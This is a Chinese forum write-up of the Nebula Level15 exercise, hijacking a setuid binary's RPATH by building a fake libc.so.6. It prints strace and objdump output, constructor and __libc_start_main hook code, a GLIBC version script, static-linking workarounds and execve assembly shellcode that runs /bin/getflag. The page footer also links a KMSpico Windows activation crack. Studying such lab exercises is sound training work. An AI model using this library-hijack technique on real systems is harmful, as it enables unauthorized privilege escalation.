Linux下的动态链接库包含漏洞

kjhn · 发表于 2014-10-27 10:55:59

说明

Nebula是一个用于Linux下提权漏洞练习的虚拟机,其第15关Level15提供了这样一个有漏洞的程序flag15

1
2
3
4
5

sh-4.2$ ls -l
total 7
-rwsr-x--- 1 flag15 level15 7161 2011-11-20 21:22 flag15
sh-4.2$ whoami
level15

要求利用该setuid程序的漏洞,从用户level15提权到用户flag15,执行/bin/getflag.
2. 漏洞挖掘

这道题是一个经典的动态链接库劫持题目,首先用strace观察flag15

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

execve("./flag15", ["./flag15"], [/* 19 vars */]) = 0
brk(0)                               = 0x880e000
access("/etc/ld.so.nohwcap", F_OK)    = -1 ENOENT (No such file or directory)
5/i686/sse2/cmov/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15/i686/sse2/cmov", 0xbfe0f594) = -1 ENOENT (No such file or directory)
open("/var/tmp/flag15/i686/sse2/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15/i686/sse2", 0xbfe0f594) = -1 ENOENT (No such file or directory)
open("/var/tmp/flag15/i686/cmov/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15/i686/cmov", 0xbfe0f594) = -1 ENOENT (No such file or directory)
open("/var/tmp/flag15/i686/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15/i686", 0xbfe0f594) = -1 ENOENT (No such file or directory)
open("/var/tmp/flag15/sse2/cmov/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15/sse2/cmov", 0xbfe0f594) = -1 ENOENT (No such file or directory)
open("/var/tmp/flag15/sse2/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15/sse2", 0xbfe0f594) = -1 ENOENT (No such file
...
open("/var/tmp/flag15/libc.so.6", O_RDONLY) = 3
...
exit_group(63)                         = ?

发现该程序链接到名为libc.so.6的动态链接库,但是/var/tmp目录对当前用户(level15)可写,因此可以在该目录下编写一个定制的libc.so.6,供程序flag15链接

我们进一步查看flag15的头信息,发现其确实依赖lib.so.6,并且使用RPATH编译,这表明flag15在运行时搜索包含动态链接库的路径/var/tmp/flag15,而且允许setuid执行(以LD_PRELOAD编译则不允许setuid执行).

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49

sh-4.2$ objdump -p /home/flag15/flag15

/home/flag15/flag15:    file format elf32-i386

Program Header:
PHDR off 0x00000034 vaddr 0x08048034 paddr 0x08048034 align 2**2
      filesz 0x00000120 memsz 0x00000120 flags r-x
  INTERP off 0x00000154 vaddr 0x08048154 paddr 0x08048154 align 2**0
      filesz 0x00000013 memsz 0x00000013 flags r--
LOAD off 0x00000000 vaddr 0x08048000 paddr 0x08048000 align 2**12
      filesz 0x000005d4 memsz 0x000005d4 flags r-x
LOAD off 0x00000f0c vaddr 0x08049f0c paddr 0x08049f0c align 2**12
      filesz 0x00000108 memsz 0x00000110 flags rw-
DYNAMIC off 0x00000f20 vaddr 0x08049f20 paddr 0x08049f20 align 2**2
      filesz 0x000000d0 memsz 0x000000d0 flags rw-
NOTE off 0x00000168 vaddr 0x08048168 paddr 0x08048168 align 2**2
      filesz 0x00000044 memsz 0x00000044 flags r--
EH_FRAME off 0x000004dc vaddr 0x080484dc paddr 0x080484dc align 2**2
      filesz 0x00000034 memsz 0x00000034 flags r--
STACK off 0x00000000 vaddr 0x00000000 paddr 0x00000000 align 2**2
      filesz 0x00000000 memsz 0x00000000 flags rw-
RELRO off 0x00000f0c vaddr 0x08049f0c paddr 0x08049f0c align 2**0
      filesz 0x000000f4 memsz 0x000000f4 flags r--

Dynamic Section:
  NEEDED             libc.so.6
  RPATH             /var/tmp/flag15
  INIT                0x080482c0
  FINI                0x080484ac
  GNU_HASH          0x080481ac
  STRTAB             0x0804821c
  SYMTAB             0x080481cc
  STRSZ             0x0000005a
  SYMENT             0x00000010
  DEBUG             0x00000000
  PLTGOT             0x08049ff4
  PLTRELSZ          0x00000018
  PLTREL             0x00000011
  JMPREL             0x080482a8
  REL                0x080482a0
  RELSZ             0x00000008
  RELENT             0x00000008
  VERNEED             0x08048280
  VERNEEDNUM          0x00000001
  VERSYM             0x08048276

Version References:
  required from libc.so.6:
0x0d696910 0x00 02 GLIBC_2.0

3. 漏洞利用
剩下的事就是要在/var/tmp/flag15目录下编写我们定制的libc.so.6,劫持flag15,提权运行/bin/getflag.
首先要hook flag15运行时用到的函数,这里有两个点可供选择.一是通过gcc 的__attribute ((constructor))修饰符声明自己的函数,这个函数可以在linux动态链接库入口_init 函数之前完成提权功能;二是在int __libc_start_main函数中加入自己的提权功能.
使用第一种方法编写:

1
2
3
4
5
6
7

sh-4.2$ cat constructor.c
#include <stdio.h>

void __attribute ((constructor)) init()
{
system("/bin/getflag");
}

编译

1	gcc -shared -fPIC -o libc.so.6 constructor.c

第二种方法编写

1
2
3
4
5
6
7

sh-4.2$ cat shell.c
#include <unistd.h>

int __libc_start_main(int (*main) (int, char **, char **), int argc, char *argv, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void *stack_end)
{
system("/bin/getflag");
}

编译

1	gcc -shared -fPIC -o libc.so.6 shell.c

得到libc.so.6
然后执行

1
2
3
4
5

sh-4.2$ /home/flag15/flag15
/home/flag15/flag15: /var/tmp/flag15/libc.so.6: no version information available (required by /home/flag15/flag15)
/home/flag15/flag15: /var/tmp/flag15/libc.so.6: no version information available (required by /var/tmp/flag15/libc.so.6)
/home/flag15/flag15: /var/tmp/flag15/libc.so.6: no version information available (required by /var/tmp/flag15/libc.so.6)
/home/flag15/flag15: relocation error: /var/tmp/flag15/libc.so.6: symbol __cxa_finalize, version GLIBC_2.1.3 not defined in file libc.so.6 with link time reference

从上面提示发现缺少一个_cxa_finalize函数,于是在上述两种方法中的constructor.c或者shell.c中都可以增加

1
2
3
4

void __cxa_finalize(void)
{
return;
}

修改constructor.c为contructor1.c,然后再次编译

1	sh-4.2$ gcc -shared -fPIC -o libc.so.6 contructor1.c

然后执行

1
2
3
4

sh-4.2$ /home/flag15/flag15
/home/flag15/flag15: /var/tmp/flag15/libc.so.6: no version information available (required by /home/flag15/flag15)
/home/flag15/flag15: /var/tmp/flag15/libc.so.6: no version information available (required by /var/tmp/flag15/libc.so.6)
/home/flag15/flag15: relocation error: /var/tmp/flag15/libc.so.6: symbol system, version GLIBC_2.0 not defined in file libc.so.6 with link time reference

上面提示又缺少GLIBC的version信息。于是我们提供一个version script在编译时使用
继续编译并执行

1
2
3
4
5

sh-4.2$ cat version
GLIBC_2.0 {};
sh-4.2$ gcc -shared -fPIC -o libc.so.6 contructor1.c -Wl,--version-script=version
sh-4.2$ /home/flag15/flag15
/home/flag15/flag15: relocation error: /var/tmp/flag15/libc.so.6: symbol system, version GLIBC_2.0 not defined in file libc.so.6 with link time reference

仍然提示出错,似乎没有找到system函数.下面也有两种方法来解决,一种是用静态链接库的方式编译来满足所有的依赖关系(why?),二是用汇编语言编写自己的system函数
第一种方法:

1
2
3
4

sh-4.2$ gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic -o libc.so.6 contructor1.c
sh-4.2$ /home/flag15/flag15
You have successfully executed getflag on a target account
/home/flag15/flag15: relocation error: /home/flag15/flag15: symbol __libc_start_main, version GLIBC_2.0 not defined in file libc.so.6 with link time reference

第二种方法:

1
2
3
4
5
6
7
8
9
10

sh-4.2$ cat shell.c
#include <unistd.h>

void __cxa_finalize(void *d) {

}

int __libc_start_main(int (*main) (int, char **, char **), int argc, char *argv, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void *stack_end) {
system();
}

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

sh-4.2$ cat system.s
.section .text
.globl system
system:

mov $getflag, %ebx
xor %edx, %edx
push %edx
push %ebx
mov %esp,%ecx
mov $11, %eax ;execve系统调用
int $0x80

.section .data
getflag: .ascii "/bin/getflag\0"

sh-4.2$ gcc -shared -fPIC -o libc.so.6 shell.c system.s -Wl,--version-script=version
sh-4.2$ /home/flag15/flag15
You have successfully executed getflag on a target account

个人认为编写shellcode的方法相对于静态链接库编译的方式更易于理解,目前自己还没有弄清楚为什么用静态链接的方式就能解决system函数的问题.
参考
www.pwntester.com/blog/2013/11/26/nebula-level15-write-up/

https://github.com/1u4nx/Exploit-Exercises-Nebula

账号		自动登录	找回密码
密码			立即注册

KMSpico10.2.0 免费激活Win10/Office2016（

zabbix3.4中文手册，官网完整COPY（2019042

zabbix3.4.1安装部署+微信推送信息+大屏显

VMware vcenter+vSphere 6.5 U2共享

winhex数据恢复教程（非常巨大，内容丰富）

CentOS6.5下redis-3.2.6的安装与配置

【跟谁学】韩宇极简英语课-技术人员不得不

[经验分享] Linux下的动态链接库包含漏洞

相关帖子

扫码加入运维网微信交流群